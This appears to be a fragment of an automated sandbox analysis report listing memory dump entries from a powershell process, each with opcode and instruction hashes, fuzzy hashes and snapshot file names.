                                                                                                                                  • Instruction ID: 8b09008865f9fe90724d89e792a3b4f248377212b4500770aebe4bcd7ea50478
                                                                                                                                  • Opcode Fuzzy Hash: 735d580432cb50005971eb975777085c00af68fd8553d098c21fa1941d6ecc4c
                                                                                                                                  • Instruction Fuzzy Hash: 8351177190DBC88FE71A9B2C98196B97FE0EF56314F0441AFE08CD7197CA24A949C7C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1433381319.00007FFAAC35D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC35D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac35d000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: acebee4a6d3c83f8a069330c3ed097b748170d3679d1f51c1d61fdc0e2695331
                                                                                                                                  • Instruction ID: ddc61402e517305e14e57dfeac794ef472329bf873c5068e3244ce9ed3d04643
                                                                                                                                  • Opcode Fuzzy Hash: acebee4a6d3c83f8a069330c3ed097b748170d3679d1f51c1d61fdc0e2695331
                                                                                                                                  • Instruction Fuzzy Hash: 0741167140DBC48FE3568B2898499527FF0EF53260B1505DFD088CB1A3D629EC4AC7E2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fdee8dd71bbc458b00b4788d326c0f91d83ec72fc56d0c2de61ba36963d68a45
                                                                                                                                  • Instruction ID: 0a75df5b96ed34cc43abef02b997fe85d1b769c95b151af9455e96ac094a1e91
                                                                                                                                  • Opcode Fuzzy Hash: fdee8dd71bbc458b00b4788d326c0f91d83ec72fc56d0c2de61ba36963d68a45
                                                                                                                                  • Instruction Fuzzy Hash: 6D314E70A189198FEF98EF58D445EE977E1FF69304F24416AE40ED7296CE24EC818BC4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e6d02c0854352998a22f07cda7e4080e02da9f83bd96f87ace300fc1d5a7ebe0
                                                                                                                                  • Instruction ID: 28a91110c0e45bbad7438d935f30432f63d6959491890b93ac5edc12a7d2c3f1
                                                                                                                                  • Opcode Fuzzy Hash: e6d02c0854352998a22f07cda7e4080e02da9f83bd96f87ace300fc1d5a7ebe0
                                                                                                                                  • Instruction Fuzzy Hash: 9421073090CB4C8FDB59DFAC984A7E97FE0EB96321F04826BD44DC3152DA74945ACB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 076c832df77ca47a1681688b66ced57a69006dc8b533476611721c261bd966c2
                                                                                                                                  • Instruction ID: c34063ea298709d12569933ae173468d4422b7ec1a8068ca09817ae80ab196d4
                                                                                                                                  • Opcode Fuzzy Hash: 076c832df77ca47a1681688b66ced57a69006dc8b533476611721c261bd966c2
                                                                                                                                  • Instruction Fuzzy Hash: 0131183081A65ECFFBB4EB14CC4ABF932D0FF42318F408539D40D86092DA39AA89CB45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3e327091e658c08c194f45f753c311bc03f861fc2c3b965d6e631da5b7fea7c3
                                                                                                                                  • Instruction ID: 6834811277435d4f8ec53fc95fd05099730ac6aca9c2d1ea94a004466efc43f5
                                                                                                                                  • Opcode Fuzzy Hash: 3e327091e658c08c194f45f753c311bc03f861fc2c3b965d6e631da5b7fea7c3
                                                                                                                                  • Instruction Fuzzy Hash: D2014E72B1CB044FE758DE1CA8854A177D1D795320F10053ED0CAC3397D922EC478781
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d59e4eb7c371b3986a24ff2f7eba5badb208033cfd86feb3444ef1584906f3c2
                                                                                                                                  • Instruction ID: 26819e8c9ef94eff4ede27d35892e635590bae6da0b77562b494be2323d4bc5b
                                                                                                                                  • Opcode Fuzzy Hash: d59e4eb7c371b3986a24ff2f7eba5badb208033cfd86feb3444ef1584906f3c2
                                                                                                                                  • Instruction Fuzzy Hash: 0201677111CB0C8FDB44EF0CE451AA9B7E0FB95364F10056DE58AC3665D636E881CB45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1438667242.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac720000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 20cef466d2d3d7db2e701596999bd664edc448b74f6823fe35967b2f38f3e3a6
                                                                                                                                  • Instruction ID: 13cbb1a8ef4e91a1ed73d4ab44ac7b23554a222244cba6c0cccae37b26f9a983
                                                                                                                                  • Opcode Fuzzy Hash: 20cef466d2d3d7db2e701596999bd664edc448b74f6823fe35967b2f38f3e3a6
                                                                                                                                  • Instruction Fuzzy Hash: 61F09A32A0D6488FE768EB1CE8468A873F0FF4632071480F6E04DC7863EA26EC05C780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6156d114742eb9744de8f202f99af35aeed31ed3c1c5f4a70b868910538c4c04
                                                                                                                                  • Instruction ID: 2ede21fd0b666847a286038f9ce1185fd1802edf901f7b1a1a675e4c35c751cb
                                                                                                                                  • Opcode Fuzzy Hash: 6156d114742eb9744de8f202f99af35aeed31ed3c1c5f4a70b868910538c4c04
                                                                                                                                  • Instruction Fuzzy Hash: 84F0373275C6048FDB4CAA1CF4429B573D1E799324B10457EE48BC2696D917E8868685
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1438667242.00007FFAAC720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC720000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac720000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9cba3bd2ca759baada0a85e4f05f85cfa883aa59767345b0b31c49b8b251b387
                                                                                                                                  • Instruction ID: 8a7cc516d36c6b51c25341b41fc89655ddc742016bb07a69070d68944cb9906c
                                                                                                                                  • Opcode Fuzzy Hash: 9cba3bd2ca759baada0a85e4f05f85cfa883aa59767345b0b31c49b8b251b387
                                                                                                                                  • Instruction Fuzzy Hash: 0BF05E32A4D5448FE758EB5CE445CA877F0EF45320B1540F6E14ECB463EA25EC44C780
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9b771f5cdf1a99f139a12660bfa3386aee9975b906fcd68a6f3102192a98239d
                                                                                                                                  • Instruction ID: 650eb038b1bc0027b3a6f7c1002a2841b12620dec6d60370042a134a29891db7
                                                                                                                                  • Opcode Fuzzy Hash: 9b771f5cdf1a99f139a12660bfa3386aee9975b906fcd68a6f3102192a98239d
                                                                                                                                  • Instruction Fuzzy Hash: 45E09271804B8C8F8B49DF1884594E97FA0FF25205B04029AE40DC7120D7719658CBC1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
• Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
Similarity
• API ID:
• String ID: 6
• API String ID: 0-1452363761
• Opcode ID: 305038e4ceea68aa292161207716a46ac481b1ffb492bd19d6379c557d139895
• Instruction ID: 31d156273e3654e781a70ab190ab2c5391c815b28d4232e4e0a34337ca2e3108
• Opcode Fuzzy Hash: 305038e4ceea68aa292161207716a46ac481b1ffb492bd19d6379c557d139895
• Instruction Fuzzy Hash: 7D32386290EB898FF7A7DB2898595B53BE1EF9A310F0851BAD04DC7193D918EC09C3D1
Memory Dump Source
• Source File: 00000000.00000002.1434096171.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac470000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 65fb7ce404622542eee6366f6eab477797c8d919065b31f5bb5bb1c3d7569329
• Instruction ID: bdd948193232c9539ba4650d0ec99f4fed9a0db9fe6ea82c9e344cd1787be994
• Opcode Fuzzy Hash: 65fb7ce404622542eee6366f6eab477797c8d919065b31f5bb5bb1c3d7569329
• Instruction Fuzzy Hash: A532C652A1F7C6CFF353572858690F57FA0EF53269B0981F7C0D98B093E909A90E83A5
Memory Dump Source
• Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e742151a170aa4d704c8547cbcd7435ed50f42a985c0bc9a99c120ce301742c7
• Instruction ID: f706186311805f84763c241074082f949325a2e4e6b8fbea58b98ffc3ff1314c
• Opcode Fuzzy Hash: e742151a170aa4d704c8547cbcd7435ed50f42a985c0bc9a99c120ce301742c7
• Instruction Fuzzy Hash: 9ED1E26190EAC68FF757EB7888155A57FA1EF52220B1891FFE48DCB0A3D91CD809C391
Memory Dump Source
• Source File: 00000000.00000002.1437971389.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac6c0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6998d326fb7a3117baa647e17c77b7ac20bf6612acce47b18d0c0f0315626287
• Instruction ID: b478cd6a45cd70c9168e1d3df216ea631efb27f154be802e7016c0bf51402763
• Opcode Fuzzy Hash: 6998d326fb7a3117baa647e17c77b7ac20bf6612acce47b18d0c0f0315626287
• Instruction Fuzzy Hash: 3CD107B291EB868FF797DB2C88591F57BE0EF56310B1461BAD04EC7192DA28DC0987C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1438207819.00007FFAAC6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffaac6e0000_powershell.jbxd
Similarity
• API ID:
• String ID: }$ }$ }$ }$ }$ }
• API String ID: 0-2881616559
• Opcode ID: 90c669aeb64a4e14d81e2415dccd64325b7eeec18fa26167ed105d1eff3b4b7a
• Instruction ID: 5a31dfe268a0de30d49b26a25f4302f469814bc7193539ea0a5c32c6dd9ba07c
• Opcode Fuzzy Hash: 90c669aeb64a4e14d81e2415dccd64325b7eeec18fa26167ed105d1eff3b4b7a
• Instruction Fuzzy Hash: F951C2A6A1E7CA4FE757C76818655716FE19FA3210B19A0FBE08CCA1A3D908D909C3D1